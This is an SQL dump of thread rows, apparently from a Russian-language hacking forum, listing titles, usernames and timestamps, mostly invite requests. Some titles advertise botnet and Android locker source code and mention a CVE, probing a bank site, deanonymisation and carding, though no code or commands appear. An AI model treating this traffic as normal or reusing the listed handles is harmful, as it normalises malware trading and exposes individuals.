(1685, 'GitHub account', '', 1984, 1988, 1410409907, 13, 0, 1, 4, 0, 0, 'w0rm', 1, 'w0rm', 1410402805, 58, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1686, '{$name}', '', 1990, 1990, 1410445714, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410445714, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1694, '{$name}', '', 2008, 2008, 1410541594, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410541594, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1687, '{$name}', '', 1995, 1995, 1410524092, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410524092, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1688, '{$name}', '', 1997, 1997, 1410526507, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410526507, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1689, '{$name}', '', 1999, 1999, 1410529240, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529240, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1690, '{$name}', '', 2000, 2000, 1410529363, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529363, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1691, '{$name}', '', 2001, 2001, 1410529372, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529372, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1692, '{$name}', '', 2002, 2002, 1410529380, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529380, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1693, '{$name}', '', 2003, 2003, 1410529396, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529396, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1695, '{$name}', '', 2011, 2015, 1410564285, 2, 0, 1, 1, 0, 0, 'Invite', 2, 'syslink', 1410553474, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1698, '{$name}', '', 2020, 2020, 1410596999, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410596999, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1700, '{$name}', '', 2022, 2022, 1410621242, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410621242, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1701, '{$name}', '', 2023, 2023, 1410626021, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410626021, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1702, '{$name}', '', 2024, 2024, 1410631321, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410631321, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1703, '{$name}', '', 2025, 2025, 1410638092, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410638092, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1704, '{$name}', '', 2026, 2026, 1410644725, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410644725, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1705, '{$name}', '', 2027, 2027, 1410644725, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410644725, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1706, '{$name}', '', 2028, 2028, 1410646206, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410646206, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1707, '{$name}', '', 2029, 2029, 1410647677, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410647677, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1708, '{$name}', '', 2030, 2030, 1410685721, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410685721, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1709, '{$name}', '', 2037, 2037, 1410704830, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410704830, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1710, '{$name}', '', 2039, 2039, 1410740359, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410740359, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1711, 'çøтðûúø', '', 2043, 2043, 1410780147, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1410780147, 32, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1715, '{$name}', '', 2049, 2049, 1410807427, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410807427, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1716, '{$name}', '', 2050, 2050, 1410811430, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410811430, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1717, '{$name}', '', 2051, 2051, 1410821345, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410821345, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1718, '{$name}', '', 2052, 2052, 1410821938, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410821938, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1719, '{$name}', '', 2055, 2055, 1410868692, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410868692, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1720, '{$name}', '', 2056, 2056, 1410870475, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410870475, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1721, '{$name}', '', 2058, 2058, 1410881729, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410881729, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1722, '{$name}', '', 2059, 2059, 1410881810, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410881810, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1724, '{$name}', '', 2062, 2062, 1410897230, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410897230, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1725, '{$name}', '', 2063, 2063, 1410904618, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410904618, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1726, 'smapp.rand.org', '', 2064, 2064, 1410935386, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1410935386, 42, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1727, '{$name}', '', 2065, 2065, 1410963293, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410963293, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1728, 'чекните плиз на баги сÂайты банка тинькофm', '', 2066, 2100, 1411050937, 7, 0, 1, 11, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1410967868, 186, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1730, 'btc-e', '', 2088, 2096, 1411041157, 7, 0, 1, 1, 0, 0, 'w0rm', 1, 'w0rm', 1411033268, 108, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1731, '{$name}', '', 2089, 2089, 1411033750, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411033750, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1732, '{$name}', '', 2097, 2097, 1411043352, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411043352, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1733, 'inj', '', 2098, 2099, 1411049200, 7, 0, 1, 1, 0, 0, 'null', 9, 'w0rm', 1411044801, 61, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1736, '{$name}', '', 2105, 2105, 1411095490, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411095490, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1737, '{$name}', '', 2106, 2106, 1411142645, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411142645, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1738, '{$name}', '', 2107, 2107, 1411150490, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411150490, 19, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1739, '{$name}', '', 2108, 2108, 1411160962, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411160962, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1740, '{$name}', '', 2110, 2110, 1411232341, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411232341, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1742, '{$name}', '', 2112, 2112, 1411255831, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411255831, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1743, '{$name}', '', 2113, 2113, 1411294539, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411294539, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1744, '{$name}', '', 2114, 2114, 1411304351, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411304351, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1745, '{$name}', '', 2115, 2115, 1411304352, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411304352, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1746, '{$name}', '', 2116, 2116, 1411304356, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411304356, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1747, '{$name}', '', 2117, 2117, 1411304358, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411304358, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1748, 'Idei pentru comunitatea noastră', '', 2118, 2149, 1411474668, 13, 0, 1, 8, 0, 0, 'lumbricus', 39, 'lumbricus', 1411306253, 65, 0, '', 1, 0, 0, 0, 0, '', 'ideas'),
(1749, '{$name}', '', 2122, 2122, 1411346254, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411346254, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1750, '{$name}', '', 2123, 2123, 1411361827, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411361827, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1751, 'Mssql - извлечение слепой внеполосÂный (out of band)', '', 2126, 2126, 1411379049, 7, 0, 1, 0, 0, 0, 'lumbricus', 39, 'lumbricus', 1411379049, 36, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1762, '{$name}', '', 2145, 2145, 1411464513, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411464513, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1752, '{$name}', '', 2128, 2128, 1411383285, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411383285, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1754, '{$name}', '', 2133, 2133, 1411400844, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411400844, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1755, '{$name}', '', 2134, 2134, 1411402415, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411402415, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1756, '{$name}', '', 2135, 2135, 1411407154, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411407154, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1757, '{$name}', '', 2136, 2136, 1411410515, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411410515, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1758, '{$name}', '', 2139, 2139, 1411430327, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411430327, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1759, '{$name}', '', 2140, 2140, 1411433455, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411433455, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1760, '{$name}', '', 2141, 2143, 1411460935, 2, 0, 1, 1, 0, 0, 'Invite', 2, 'syslink', 1411438471, 14, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1761, '{$name}', '', 2142, 2142, 1411455857, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411455857, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1763, '{$name}', '', 2148, 2148, 1411471797, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411471797, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1764, '{$name}', '', 2150, 2150, 1411574850, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411574850, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1766, '{$name}', '', 2152, 2152, 1411590646, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411590646, 14, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1767, 'Cve-2014-6271', '', 2153, 2157, 1411657400, 15, 0, 1, 1, 0, 0, 'lumbricus', 39, 'syslink', 1411641697, 115, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1768, '{$name}', '', 2154, 2154, 1411645121, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411645121, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1769, '{$name}', '', 2155, 2155, 1411647371, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411647371, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1817, '{$name}', '', 2209, 2209, 1411925372, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411925372, 27, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1816, '{$name}', '', 2208, 2208, 1411925358, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411925358, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1815, '{$name}', '', 2207, 2207, 1411924925, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411924925, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1814, '{$name}', '', 2206, 2206, 1411924060, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411924060, 13, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1813, '{$name}', '', 2205, 2205, 1411882830, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411882830, 16, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1811, '{$name}', '', 2203, 2203, 1411824082, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411824082, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1810, '{$name}', '', 2202, 2202, 1411822286, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411822286, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1809, '{$name}', '', 2201, 2201, 1411820182, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411820182, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1808, '{$name}', '', 2199, 2199, 1411809920, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411809920, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1803, '{$name}', '', 2192, 2192, 1411673862, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411673862, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1804, '{$name}', '', 2195, 2195, 1411725110, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411725110, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1805, '{$name}', '', 2196, 2196, 1411736385, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411736385, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1806, '{$name}', '', 2197, 2197, 1411750650, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411750650, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1820, '{$name}', '', 2220, 2220, 1411992475, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411992475, 91, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1819, 'w0rm Cloud', '', 2213, 2213, 1411955430, 10, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1411955430, 161, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1826, 'деанон через vk', '', 2234, 2242, 1421257940, 13, 0, 1, 4, 0, 0, 'admin', 1, 'admin', 1421086243, 53, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1830, 'new admin - yakuza112', '', 2245, 2845, 1443308276, 13, 0, 1, 5, 0, 0, 'admin', 1, 'ropertus', 1422122659, 159, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1834, 'Source code android locker', '', 2260, 2260, 1432480259, 15, 0, 1, 0, 0, 0, 'syslink', 13, 'syslink', 1432480259, 69, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1840, 'forum-seo.net', '', 2271, 2271, 1437013460, 10, 0, 1, 0, 0, 0, 'Versus71', 165, 'Versus71', 1437013460, 151, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1841, 'phreaker.us', '', 2272, 2272, 1437629241, 10, 0, 1, 0, 0, 0, 'Versus71', 165, 'Versus71', 1437629241, 51, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1848, 'metaizm', '', 2279, 2279, 1439096915, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1439096915, 36, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2506, 'BitTorrent', '', 3046, 3046, 1463762659, 37, 0, 1, 0, 0, 0, 'ke7hb', 387, 'ke7hb', 1463762659, 865, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1853, 'tdss', '', 2285, 2285, 1439233133, 4, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1439233133, 58, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1855, 'geneticsandsociety.org', '', 2287, 2287, 1439273803, 10, 0, 1, 0, 0, 0, 'st1x0', 171, 'st1x0', 1439273803, 29, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1858, 'gagaloop', '', 2299, 2299, 1439404016, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1439404016, 23, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1859, 'megafon', '', 2300, 2304, 1439824907, 7, 0, 1, 1, 0, 0, 'w0rm', 100, 'w0rm', 1439792087, 36, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1861, 'download Neutrino Botnet source code + builder', '', 2303, 2692, 1440888161, 15, 0, 1, 10, 0, 0, 'hunter_exploitkit', 172, '*Hash*', 1439821381, 166, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1868, 'Phant0m', '', 2318, 2318, 1440201655, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440201655, 20, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1862, 'Black box list', '', 2305, 2893, 1445629858, 7, 0, 1, 9, 0, 0, 'w0rm', 100, 'w0rm', 1439826864, 197, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1864, 'nickname', '', 2313, 2313, 1440010165, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440010165, 15, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1865, 'ree4', '', 2314, 2314, 1440013600, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440013600, 26, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1869, 'bidex', '', 2320, 2320, 1440258049, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440258049, 13, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1870, 'NFM, nfmka', '', 2325, 2325, 1440398653, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440398653, 19, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1871, 'dark001', '', 2326, 2326, 1440413665, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440413665, 19, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2400, 'Malware Source Code', '', 2906, 2907, 1446705102, 15, 0, 1, 1, 0, 0, 'dark001', 178, 'st1x0', 1446704703, 75, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2398, 'EXploits Databases', '', 2899, 2899, 1446017213, 10, 0, 1, 0, 0, 0, 'dark001', 178, 'dark001', 1446017213, 79, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2397, 'Megafon', '', 2894, 2898, 1445878300, 7, 0, 1, 1, 0, 0, 'w0rm', 100, 'Kingbeef', 1445771564, 37, 0, '', 0, 0, 0, 0, 0, '', NULL),
(2392, 'forum-seo.net', '', 2878, 2878, 1444660755, 37, 0, 1, 0, 0, 0, 'w0rm', 100, 'w0rm', 1444660755, 1070, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2387, 'mrsalvadore', '', 2862, 2862, 1443389868, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443389868, 8, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2346, 'hackers & carders forums', '', 2801, 2936, 1449041270, 37, 0, 1, 6, 0, 0, 'w0rm', 100, 'w0rm', 1442919903, 2698, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2360, 'crackss', '', 2819, 2819, 1443006075, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443006075, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2357, 'json10331', '', 2815, 2815, 1442950510, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442950510, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2342, 'Monopoly.ms', '', 2800, 2933, 1448806747, 37, 0, 1, 1, 0, 0, 'w0rm', 100, 'w0rm', 1442918885, 836, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2361, 'Oleg', '', 2820, 2820, 1443007048, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443007048, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2362, 'as1w', '', 2821, 2821, 1443020435, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443020435, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2363, 'f0ros', '', 2822, 2822, 1443022317, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443022317, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2364, 'nickname', '', 2823, 2823, 1443023396, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443023396, 1, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2319, 'esmurf', '', 2787, 2787, 1442836747, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442836747, 2, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2316, 'nickname', '', 2783, 2783, 1442833996, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442833996, 0, 0, '', 2, 1, 0, 0, 0, '', NULL),
(2299, 'sAv', '', 2763, 2763, 1442755750, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442755750, 8, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2300, 'Full_Crash', '', 2764, 2764, 1442761011, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442761011, 8, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2301, 'Zhak', '', 2765, 2765, 1442761194, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442761194, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2302, 'Zhak', '', 2766, 2766, 1442761346, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442761346, 8, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2303, 'anri12', '', 2767, 2767, 1442774668, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442774668, 7, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2304, 'noescape0', '', 2768, 2768, 1442778012, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442778012, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2305, 'nickname', '', 2769, 2769, 1442778920, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442778920, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2306, 'tunboy', '', 2770, 2770, 1442782064, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442782064, 6, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2309, 'ketniggo', '', 2775, 2775, 1442819244, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442819244, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2310, 'justfrorgetaboutme', '', 2776, 2776, 1442825199, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442825199, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2311, 'nickname', '', 2777, 2777, 1442833259, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442833259, 1, 0, '', 2, 1, 0, 0, 0, '', NULL),
(2294, 'LukcyRab', '', 2758, 2758, 1442739590, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442739590, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2293, 'LukcyRab', '', 2757, 2757, 1442739549, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442739549, 2, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2292, 'fgddge', '', 2756, 2756, 1442718133, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442718133, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2290, 'aaj6', '', 2753, 2753, 1442706380, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442706380, 2, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2291, 'aaj6', '', 2754, 2754, 1442706436, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442706436, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2289, 'mmmmmmm9999', '', 2752, 2752, 1442702293, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442702293, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2271, 'Nurba', '', 2734, 2734, 1442671151, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442671151, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2270, 'svyatoal', '', 2733, 2733, 1442665349, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442665349, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2251, 'Jay', '', 2714, 2714, 1442588981, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442588981, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2250, 'sdfogsdofg45', '', 2713, 2713, 1442588547, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442588547, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2246, 'Clooney', '', 2709, 2709, 1442584933, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442584933, 6, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2247, 'nickname', '', 2710, 2710, 1442585792, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442585792, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2248, 'temaniger', '', 2711, 2711, 1442585982, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442585982, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2307, 'nickname', '', 2773, 2773, 1442813894, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442813894, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2308, 'zoom', '', 2774, 2774, 1442816534, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442816534, 8, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2241, '#ziga', '', 2704, 2704, 1442583393, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442583393, 7, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2378, 'nickname', '', 2844, 2844, 1443288935, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443288935, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2377, 'dotabooster.com', '', 2842, 2842, 1443200935, 10, 0, 1, 0, 0, 0, 'w0rm', 100, 'w0rm', 1443200935, 56, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2376, 'Robotxobot', '', 2841, 2841, 1443189792, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443189792, 6, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2372, 'DocXor', '', 2834, 2834, 1443104630, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443104630, 10, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2358, 'Russo', '', 2816, 2816, 1442960147, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442960147, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2359, 'nickname', '', 2817, 2817, 1443000057, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443000057, 1, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2505, 'westernunion.com', '', 3045, 3045, 1463758995, 37, 0, 1, 0, 0, 0, 'ke7hb', 387, 'ke7hb', 1463758995, 1474, 0, '', 1, 0, 0, 0, 0, '', NULL),
